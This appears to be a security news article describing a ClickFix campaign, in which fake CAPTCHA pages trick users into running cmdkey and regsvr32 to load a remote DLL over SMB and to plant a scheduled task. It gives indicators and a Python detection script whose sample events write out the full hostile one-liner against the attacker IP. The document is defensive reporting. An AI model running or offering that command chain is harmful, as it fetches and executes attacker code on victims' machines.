ClickFix Attack Replaces PowerShell with Cmdkey and Remote Regsvr32
Key Takeaways
- A new variant of the ClickFix attack chain has emerged, abandoning PowerShell in favor of native Windows tools.
- The attack leverages cmdkey and regsvr32 to silently deliver and execute a remote payload without dropping files to disk.
- Discovered by CyberProof, this technique employs social engineering with fake CAPTCHA pages to trick users into executing a multi-stage command.
- The attack establishes persistence by creating a scheduled task that retrieves its definition from a remote XML file, making it stealthy and adaptable.
- Organizations should enhance monitoring for suspicious activity involving these legitimate Windows utilities and reinforce user education against social engineering tactics.
ClickFix Evolves: PowerShell Replaced by Native Windows Tools for Stealthy Payload Delivery
A sophisticated evolution of the ClickFix attack, dubbed “ClickFix v2” by researchers, has been observed in the wild. This iteration marks a significant strategic shift: instead of PowerShell, it abuses a chain of legitimate Windows utilities for payload delivery and execution. Because the payload is loaded directly from an attacker-controlled SMB share, the technique leaves few of the on-disk artifacts that conventional, file-centric detection relies on.
ClickFix campaigns have historically relied on social engineering to coerce users into running malicious commands. Earlier versions typically involved victims pasting commands, often obtained from deceptive CAPTCHA pages, into the Windows Run dialog. These commands would then invoke PowerShell to download and execute a malicious payload. The efficacy of this method has made ClickFix a persistent concern for cybersecurity professionals.
The CyberProof Threat Research Team, comprising Deepak Nayak, Kithu Shajil, and Veena Sagar, identified this novel ClickFix variant. Their findings, published on April 22, 2026, highlight the complete abandonment of PowerShell in this updated attack. This change significantly hinders detection by security tools configured to flag PowerShell-based malicious activity.
CyberProof’s researchers noted that the updated campaign employs a concise command chain: cmdkey stores credentials for the attacker’s host, then regsvr32 retrieves a remote Dynamic Link Library (DLL) over SMB and executes it, all through trusted, signed Windows components. By “living off the land” with built-in Windows tools (LOLBins) only, attackers blend their activity into normal system behavior, making detection considerably harder.
This pivot has implications for organizations whose detection logic is keyed to PowerShell or to file drops. Controls that look for suspicious files written to disk, or for powershell.exe spawning from unusual parents, will not fire, because the chain uses only legitimate system binaries and loads its payload from the network. A single, socially engineered command executed through the Windows Run dialog is sufficient to initiate a multi-stage attack chain, establish persistence on the compromised machine, and connect back to attacker-controlled infrastructure. This low barrier to entry makes the threat relevant to a broad spectrum of potential victims, from individual users to corporate entities.
The campaign’s effectiveness is amplified by the minimal user interaction required for infection: a simple paste and execution of a pre-loaded command. The attackers meticulously craft the initial phishing pages, often impersonating legitimate Cloudflare CAPTCHA screens, to build trust and encourage victims to perform the malicious action.
Inside the Infection Mechanism
The attack sequence begins when a user navigates to a phishing page disguised as a CAPTCHA verification prompt. The page instructs the victim to open the Windows Run dialog (Win + R), paste a provided command, and press Enter. The observed command initiates cmd.exe and orchestrates two primary actions.

First, cmdkey stores credentials for the remote IP address 151.245.195[.]142 under the username “guest” in the Windows Credential Manager, so that the subsequent SMB connection to that host authenticates without prompting the user. Immediately afterwards, regsvr32 is invoked with its silent switch to load a DLL, “demo.dll,” from the attacker’s Server Message Block (SMB) share via a Universal Naming Convention (UNC) path; regsvr32 calls the DLL’s DllRegisterServer export, which is where the malicious code runs. A “REM” comment appended to the command, reading “I am not a robot,” is cosmetic: cmd.exe ignores it, but it makes the pasted text look like a genuine verification step.

Upon execution of the remote DLL by regsvr32, its DllRegisterServer export triggers a hidden CreateProcessA call that registers a scheduled task named “RunNotepadNow” with the Windows Task Scheduler. The task definition is not shipped inside the DLL; it is fetched from a remote XML file hosted on the attacker’s server, so the attackers can change the second stage at any time without redeploying the initial DLL. The on-host footprint is small, but not zero: once a task is registered, the Task Scheduler keeps a copy of its definition under %SystemRoot%\System32\Tasks and in the TaskCache registry key, so the task name itself is a hunting artifact, and the process creation that registered it is visible to endpoint telemetry.

To counter this advanced threat, security teams must implement enhanced monitoring strategies. This includes vigilance over cmdkey usage, particularly when associated with external IP addresses, and careful scrutiny of regsvr32 processes loading remote DLLs via UNC paths. Robust alerting should be configured for chained command execution originating from cmd.exe, and any Task Scheduler activity referencing remote XML files warrants immediate and thorough review. Network-level restrictions or stringent monitoring of outbound SMB and UNC access are also critical. Furthermore, continuous user education remains paramount to equip employees with the ability to recognize and avoid ClickFix-style social engineering attempts before they inadvertently execute malicious commands.
Indicators of Compromise (IOCs):
- 151[.]245.195.142
- \\151[.]245.195.142\hi\demo.dll
- \\151[.]245.195.142\hi\777.xml
- SHA256: b2d9a99de44a7cd8faf396d0482268369d14a315edaf18a36fa273ffd5500108
What You Should Do
- Enhance Endpoint Detection and Response (EDR) Rules: Configure EDR systems to detect unusual execution patterns involving cmdkey and regsvr32, especially when they interact with remote IP addresses or UNC paths.
- Monitor for Chained Command Execution: Implement alerts for instances where cmd.exe is used to chain multiple commands, particularly those involving credential storage or remote file loading.
- Restrict Outbound SMB/UNC Traffic: Limit or strictly monitor outbound SMB (TCP 445) and UNC access from endpoints to external IP addresses to prevent remote payload retrieval.
- Review Scheduled Task Creation: Scrutinize any new scheduled tasks, particularly those that retrieve their definitions or executables from remote XML files or network shares.
- Conduct Regular Security Awareness Training: Educate users about social engineering tactics, specifically those mimicking CAPTCHA pages, and emphasize the dangers of pasting or executing commands from untrusted sources.
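The infection chain and the monitoring advice above can be turned into concrete detection logic. The following Python is an added example written for this page, not code from CyberProof or HackersRadar. It runs four rules over hand-constructed process-creation events shaped like Sysmon Event ID 1 / Security 4688 records: cmdkey storing credentials for a non-internal target, regsvr32 loading a DLL over a UNC path, a task registered from a remote XML file (and spawned by regsvr32), and the cmd.exe one-liner that chains the utilities behind a decoy REM comment. The IP address is the IOC reported in the article and the share and file names follow the listed IOCs; the `/pass:x` value, the exact switches, the use of schtasks.exe with `/xml` as the task-registration mechanism, and the `INTERNAL_SUFFIXES` allowlist are assumptions.

```python
"""Flag the cmdkey -> regsvr32 -> scheduled-task ClickFix chain in process events.

Added example, not CyberProof's or HackersRadar's code. The events below are
hand-constructed approximations of Sysmon Event ID 1 / Security 4688 fields.
"""
import ipaddress
import re

# Hostname suffixes treated as internal (assumption: tune to your environment).
INTERNAL_SUFFIXES = (".corp.local", ".internal")

UNC_RE = re.compile(r'\\\\([^\\\s"]+)\\([^\s"]+)')                 # \\host\share\path
CMDKEY_TARGET_RE = re.compile(r'/(?:add|generic):([^\s"]+)', re.IGNORECASE)
SCHTASKS_XML_RE = re.compile(r'/xml\s+"?([^\s"]+)', re.IGNORECASE)


def is_external_target(target: str) -> bool:
    """True for a globally routable IP, or a hostname outside INTERNAL_SUFFIXES."""
    try:
        return ipaddress.ip_address(target).is_global
    except ValueError:
        return not target.lower().endswith(INTERNAL_SUFFIXES)


def analyze(event: dict) -> list[str]:
    """Return the names of every rule a single process-creation event matches."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    cmdline = event["command_line"]
    lowered = cmdline.lower()
    hits = []

    # Stage 1a: credentials stored for a non-internal target (enables a silent SMB connect).
    if image == "cmdkey.exe":
        m = CMDKEY_TARGET_RE.search(cmdline)
        if m and is_external_target(m.group(1)):
            hits.append("cmdkey_external_target")

    # Stage 1b: regsvr32 loading a DLL over a UNC path to a non-internal host.
    if image == "regsvr32.exe":
        m = UNC_RE.search(cmdline)
        if m and is_external_target(m.group(1)):
            hits.append("regsvr32_remote_dll")

    # Stage 2 (assumed mechanism): task registered from XML fetched over UNC,
    # and any task-scheduler process whose parent is regsvr32.
    if image == "schtasks.exe":
        m = SCHTASKS_XML_RE.search(cmdline)
        if m and UNC_RE.match(m.group(1)):
            hits.append("schtasks_remote_xml")
        if parent == "regsvr32.exe":
            hits.append("schtasks_spawned_by_regsvr32")

    # The one-liner pasted into the Run dialog: cmd chaining both utilities,
    # optionally padded with a decoy REM comment.
    if image == "cmd.exe" and "cmdkey" in lowered and "regsvr32" in lowered and "&" in lowered:
        hits.append("cmd_chains_cmdkey_regsvr32")
        if re.search(r"&\s*rem\b", lowered):
            hits.append("cmd_decoy_rem_comment")
    return hits


def scan(events: list[dict]) -> list[dict]:
    """Run analyze() over a batch and return one finding per (event, rule) pair."""
    findings = []
    for event in events:
        for rule in analyze(event):
            findings.append({"rule": rule, "image": event["image"],
                             "command_line": event["command_line"]})
    return findings


# Constructed sample events. IP and share/file names follow the article's IOCs;
# switches, the /pass value and the schtasks stage are assumptions.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"cmd.exe /c cmdkey /add:151.245.195.142 /user:guest /pass:x "
                     r"& regsvr32 /s \\151.245.195.142\hi\demo.dll & REM I am not a robot"},
    {"image": r"C:\Windows\System32\cmdkey.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmdkey /add:151.245.195.142 /user:guest /pass:x"},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"regsvr32 /s \\151.245.195.142\hi\demo.dll"},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent_image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"schtasks /create /tn RunNotepadNow /xml \\151.245.195.142\hi\777.xml"},
    # Benign activity that must not fire.
    {"image": r"C:\Windows\System32\cmdkey.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmdkey /add:fileserver.corp.local /user:CORP\jdoe /pass:x"},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r'regsvr32 /s "C:\Program Files\Vendor\component.dll"'},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f'{finding["rule"]:32} {finding["command_line"]}')
```

The field names map directly onto Sysmon's Image, ParentImage and CommandLine, so the same rules port to a SIEM query. The internal-suffix allowlist is deliberate: a regsvr32 load from a corporate file server is common in software deployment, and alerting on every UNC path would drown the signal. The two benign events at the end of the sample set show that the rules stay quiet on an internal cmdkey target and on a local DLL registration.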
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.